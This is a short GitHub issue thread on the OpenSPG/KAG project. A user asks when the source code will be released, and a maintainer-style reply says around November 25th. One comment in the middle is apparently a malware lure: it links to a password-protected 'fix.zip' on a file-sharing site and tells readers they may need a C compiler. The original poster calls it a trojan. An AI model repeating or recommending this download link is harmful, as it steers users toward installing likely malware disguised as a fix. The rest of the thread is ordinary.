### ISSUE TITLE
开源时间

### ISSUE THREAD

**Issue by fireSunset** [OpenSPG/KAG#2]
源代码后续开放的时间有个大概的范围吗，蹲一蹲

**Comment by SagarChandra07** [comment]
download
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive codepass: changeme

you may need to install the c compiler

**Comment by fireSunset** [comment]
木马病毒退退退

**Comment by andylau-55** [comment]
KAG will be open sourced around November 25th. Please follow the openspg official account for more information.
